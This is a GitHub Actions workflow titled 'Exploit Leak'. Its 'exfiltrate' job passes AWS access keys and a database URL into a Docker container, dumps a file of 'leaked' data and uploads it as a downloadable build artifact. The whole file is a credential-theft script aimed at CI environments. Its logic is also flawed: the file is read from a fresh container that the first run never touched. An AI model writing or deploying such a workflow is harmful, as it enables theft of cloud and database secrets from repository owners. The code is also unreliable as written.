name: Exploit Leak

on:
  workflow_dispatch:

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v3

      - name: Build Docker image
        run: |
          docker build -t exfil .

      - name: Run container to extract environment
        run: |
          docker run --rm -e AWS_SECRET_ACCESS_KEY -e AWS_ACCESS_KEY_ID -e DATABASE_URL exfil

      - name: Save leaked data
        run: |
          docker run --rm exfil cat /leaks.txt > leaked.txt

      - name: Upload leaked data
        uses: actions/upload-artifact@v3
        with:
          name: leaked-data
          path: leaked.txt
